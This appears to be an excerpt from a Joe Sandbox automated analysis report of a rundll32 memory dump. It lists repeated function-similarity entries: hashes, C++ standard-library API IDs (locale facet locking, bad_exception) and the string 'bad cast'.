                                                                                                                                                                                • Instruction ID: f90d0cbeb8849b8ddfe9301e58c6abb60f629ccff1643932871510168bf1b9cc
                                                                                                                                                                                • Opcode Fuzzy Hash: e92ebb4505384e37149a9af64b0ed7b997fd3b62a18224f75f4565cc40b02c60
                                                                                                                                                                                • Instruction Fuzzy Hash: BF315E32208FC081EB169B25E4443DE67E2E794BA8F550322DE6E477EBDE38C4868700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: bb88f8af8f6ad0f94797e91181e4a5fede4ca1b0857083484043c23cb2229bcb
                                                                                                                                                                                • Instruction ID: 3808d9866e7b7f3d6a966728e857d5a247eeb35cfa00ec76f8d8aa8290c398c9
                                                                                                                                                                                • Opcode Fuzzy Hash: bb88f8af8f6ad0f94797e91181e4a5fede4ca1b0857083484043c23cb2229bcb
                                                                                                                                                                                • Instruction Fuzzy Hash: DE310E71208F8092EB17AB65E9403DD77E2F794BA8F945322DE59876EBDE34C4458700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: f6e975c9ed1fc811ddeed3bf09c1872f6a5632ab065b9bea6ee0b1db81a6e053
                                                                                                                                                                                • Instruction ID: 2bb5866b6440bdf70ab0a9b501e321d58f8fdf78b88863b041d2a7bf6f44a858
                                                                                                                                                                                • Opcode Fuzzy Hash: f6e975c9ed1fc811ddeed3bf09c1872f6a5632ab065b9bea6ee0b1db81a6e053
                                                                                                                                                                                • Instruction Fuzzy Hash: 95312C32308F8082EB179B69E5403DD77E2F794BA8F545322DE6A476ABDE38C4458700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: d82304bf4a96c8aa3365fbec0ce9b6afb946fba8665589bd6e4ea4bbafcdc822
                                                                                                                                                                                • Instruction ID: c37f88510a55e7f83613cc773ea4baf1145b8c671dba1654328d6e24f94d379a
                                                                                                                                                                                • Opcode Fuzzy Hash: d82304bf4a96c8aa3365fbec0ce9b6afb946fba8665589bd6e4ea4bbafcdc822
                                                                                                                                                                                • Instruction Fuzzy Hash: 65311231208FC191EB16DB65E4403DE67E2F794BA8F595321DE69476EBDF38C4468700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4059195664-3145022300
                                                                                                                                                                                • Opcode ID: 1fe0c26a9036abef5ee95c4ac4b3fdedf737f9338d7163a728943c57dc64d707
                                                                                                                                                                                • Instruction ID: 96a7cdac7a6f02ceae9284f1fef285b9d3f49cea0d7ffb71a79930049ef5e034
                                                                                                                                                                                • Opcode Fuzzy Hash: 1fe0c26a9036abef5ee95c4ac4b3fdedf737f9338d7163a728943c57dc64d707
                                                                                                                                                                                • Instruction Fuzzy Hash: 50315E76209F8091EB12DB65E4403DE67E2F794BA8F544322DE59476EBDE38C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: 27282701b454dac3068bf00fab1c7e364559ed58de656c77c796e4e0c147b80e
                                                                                                                                                                                • Instruction ID: dbabbc02a373c794c339cca9c47852f090b37529b7ee0d16ef0cd5eb3dbe4b94
                                                                                                                                                                                • Opcode Fuzzy Hash: 27282701b454dac3068bf00fab1c7e364559ed58de656c77c796e4e0c147b80e
                                                                                                                                                                                • Instruction Fuzzy Hash: B4312335608F8091EB169B65E4403DE67E2F794BA8F554322DE6E476EBDE3CC886C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: cb7218c9b988feff46bbc91aa592dedbc53cea0b91ed73328e4fffe9f7b77c5a
                                                                                                                                                                                • Instruction ID: 384a23b054da03d4bdea73de445a816cd55d83fc79a66dc688f62e21840672b8
                                                                                                                                                                                • Opcode Fuzzy Hash: cb7218c9b988feff46bbc91aa592dedbc53cea0b91ed73328e4fffe9f7b77c5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 69313032608FC081EB529B29E5803ED67E2E794BA8F584322DE5D477EBDE34C885C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: a319b8759b665be4c8045255bfd444d3c342c13c887630317bc6ad245192e08a
                                                                                                                                                                                • Instruction ID: 1a7a88b02d801af55b6658bbf7a5cba8262ae115bdd3cdcffcd2c77184196bf1
                                                                                                                                                                                • Opcode Fuzzy Hash: a319b8759b665be4c8045255bfd444d3c342c13c887630317bc6ad245192e08a
                                                                                                                                                                                • Instruction Fuzzy Hash: EB31FE32208F8091EB169B29E8503ED67F2F794BA8F544322DE59476EBDE34C885C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: 536d951579794d9ac5848435dcda0d8056ecb28f286086e041b4dee6b5989298
                                                                                                                                                                                • Instruction ID: 6c708a7a23ab49fa9ab953205e29774acd910740a333576d65895888f78e9102
                                                                                                                                                                                • Opcode Fuzzy Hash: 536d951579794d9ac5848435dcda0d8056ecb28f286086e041b4dee6b5989298
                                                                                                                                                                                • Instruction Fuzzy Hash: 45311E32208F8091EB179B65E8403DE67E2E794BA8F554322DE79477EBDE78C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: 29cb517ef353edaf7fe96a55ad9e16f417422b8bc592340c9ae3e73a311cc7df
                                                                                                                                                                                • Instruction ID: 4497246a60ab34339eea7d15d8496df929c8ac60771bca08df8bcc82116ee3e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 29cb517ef353edaf7fe96a55ad9e16f417422b8bc592340c9ae3e73a311cc7df
                                                                                                                                                                                • Instruction Fuzzy Hash: 85312A32608F8082EB13AB65E5503DD77E3F794BA8F554322DE69476EBDE34C8468740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: 7e8749b240ba5670e75988a1d08956d1c9e00ca2f6b9f8a9a670e6f4b17f3c11
                                                                                                                                                                                • Instruction ID: 98ba51b4317d49b9add98fe7917f99efa0d52a0031ae6552ad0f26ea79af1e3a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e8749b240ba5670e75988a1d08956d1c9e00ca2f6b9f8a9a670e6f4b17f3c11
                                                                                                                                                                                • Instruction Fuzzy Hash: A5311B32708F8092EB179B65E9407ED77E2E794BA8F584322DE59476EBDE34C485C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: ae2b33eba0b5e10c670be5b46dedf71b670be409d592ec7623dc0068669dc4ac
                                                                                                                                                                                • Instruction ID: d425447ffe6272df24a0c702aca624cd5964cfa8d849b482af1784341dcf99e3
                                                                                                                                                                                • Opcode Fuzzy Hash: ae2b33eba0b5e10c670be5b46dedf71b670be409d592ec7623dc0068669dc4ac
                                                                                                                                                                                • Instruction Fuzzy Hash: A1313271208FC091EB12DB25E5403DE67E2F794BA8F554321DE6D476EBDE38C8468700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 757613215-3145022300
                                                                                                                                                                                • Opcode ID: df4a671e88b4901a954107639c9d9fabf74deb048c105a0cb1eb7e8a5d1e765f
                                                                                                                                                                                • Instruction ID: 6d79ff7e33b039aa051bc246b972177f4a00ef838a5b817e976541debf2b2fb2
                                                                                                                                                                                • Opcode Fuzzy Hash: df4a671e88b4901a954107639c9d9fabf74deb048c105a0cb1eb7e8a5d1e765f
                                                                                                                                                                                • Instruction Fuzzy Hash: F3313E32208F8081EB16AB65E4503ED67F2F794BA8F544322DE59476EBDF38C8858740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: 2127f81a5437bb88b075241f3d29aaf0cf321937bbea42743d9c4b13c04cc0b3
                                                                                                                                                                                • Instruction ID: db808eca60465a731d9448cb3ef7a2ddeb2de1b25376732aa00c8fb22b45502e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2127f81a5437bb88b075241f3d29aaf0cf321937bbea42743d9c4b13c04cc0b3
                                                                                                                                                                                • Instruction Fuzzy Hash: A1315531208F8091EB12DB65E4403DE67E2F794BA8F555321DE6E476EBDE38C846D700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 662288457-3145022300
                                                                                                                                                                                • Opcode ID: 783429eb793c2f2f50d0740cc6b0d3dbcf1faffe9df41ccb9df6b9a803999d4c
                                                                                                                                                                                • Instruction ID: 75df07cdbb654ab571910a9cc54b5c82fa9bf397b68abfb1c1d7903c85efaa28
                                                                                                                                                                                • Opcode Fuzzy Hash: 783429eb793c2f2f50d0740cc6b0d3dbcf1faffe9df41ccb9df6b9a803999d4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 18312172209F8091EB16DB25E9403DE67E2F794BA8F594322DE69476EBDE38C446C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4217240666-3145022300
                                                                                                                                                                                • Opcode ID: 0aac932d3e7c268931cf707a4d93752f56fee1ca9c031bf76c3d673b10170def
                                                                                                                                                                                • Instruction ID: 3bc83d4167a27091065f254eb766c8b5264fc50d248d327eced56547e3d96f70
                                                                                                                                                                                • Opcode Fuzzy Hash: 0aac932d3e7c268931cf707a4d93752f56fee1ca9c031bf76c3d673b10170def
                                                                                                                                                                                • Instruction Fuzzy Hash: FA311032609F8091EB16DB25E8503DE67E2F794BA8F584322DE59476EBDE38C486C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 4059195664-3145022300
                                                                                                                                                                                • Opcode ID: 2041dd7da891098dc9ea848057da1134df316c48a7d12d52e319c026ea6f695a
                                                                                                                                                                                • Instruction ID: f0dc209602f23afc69fe86582c1ed599d02d01ccaee988f793cf263448bebaa4
                                                                                                                                                                                • Opcode Fuzzy Hash: 2041dd7da891098dc9ea848057da1134df316c48a7d12d52e319c026ea6f695a
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A313C32608FC091EB16DB25E8403ED67E2F794BA8F544322DE59476EBDE38C9968740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: 8e39b244ec004d33a78bec66716c19fd785043de6809f57852e2fe2761deb095
                                                                                                                                                                                • Instruction ID: 0fede1db7a1e3090302a7af53907c3853671e20e77429abb00c2bc3bacc43f4e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e39b244ec004d33a78bec66716c19fd785043de6809f57852e2fe2761deb095
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A312132208F8091EB129B65E4403DE77E2F794BA8F555322DE69476EBDE38C586C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 2760077954-3145022300
                                                                                                                                                                                • Opcode ID: dc53cec89c99da22bcd306d525d4bf72450f34741b04eaec344622fce76dc459
                                                                                                                                                                                • Instruction ID: fe870c8f1034e9024e723d2146cfe7126b7bea0c233255ef3e107ba95dcc7ae3
                                                                                                                                                                                • Opcode Fuzzy Hash: dc53cec89c99da22bcd306d525d4bf72450f34741b04eaec344622fce76dc459
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D310032608F8091EB16DF25E4543DE67E2F794BA8F544722DE5A476EBDE38C886C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 560648410-3145022300
                                                                                                                                                                                • Opcode ID: cf3a473d4a2924b6d3a61fecd1b2eafc96592f01937f7426af8f1c781fe91554
                                                                                                                                                                                • Instruction ID: 5348df953f74dbb4c4a19727cae6f129171a326717bd10a936227beee2393422
                                                                                                                                                                                • Opcode Fuzzy Hash: cf3a473d4a2924b6d3a61fecd1b2eafc96592f01937f7426af8f1c781fe91554
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A311E32208FC091EB129B25E8543DE67E2F794BA8F594322DE69476EBDF38C446C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacet__int64_lockstd::locale::_
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 1666373992-3145022300
                                                                                                                                                                                • Opcode ID: 93a5699e027cb8ef89e0de3b46b91101183ef16d26cf5389666435c13f441cb5
                                                                                                                                                                                • Instruction ID: 24d5321c545d6bfd41f844bb24671c80ea006bf8688a288e86d02943324ccff0
                                                                                                                                                                                • Opcode Fuzzy Hash: 93a5699e027cb8ef89e0de3b46b91101183ef16d26cf5389666435c13f441cb5
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31D632219F8481DB61DB14E48039EB7A2F7887A8F504315EA9E47BEADF38C595CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacet__int64_lockstd::locale::_
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 1666373992-3145022300
                                                                                                                                                                                • Opcode ID: d78c58cc6dc32a45fa35aa0ea62847462abab04b09d4575ad04a92c308c6451f
                                                                                                                                                                                • Instruction ID: f38fef9b9f3df8af5716efe82dec84a596441c74b644ecff4774f8f730e83658
                                                                                                                                                                                • Opcode Fuzzy Hash: d78c58cc6dc32a45fa35aa0ea62847462abab04b09d4575ad04a92c308c6451f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8831B636219F8581DB619B15E48039EB7A1F7C87A8F500311EA9E43BEBDF38C585CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: 4ee676152d8a6d3fc2897e1a750d37abcf8e05a29651dc9c84745b4ac20e915c
                                                                                                                                                                                • Instruction ID: d9c82ac10c24bd5e8e5795c1dc745f1f22c8ef9def5e0e3bde2a8f09a550e3d9
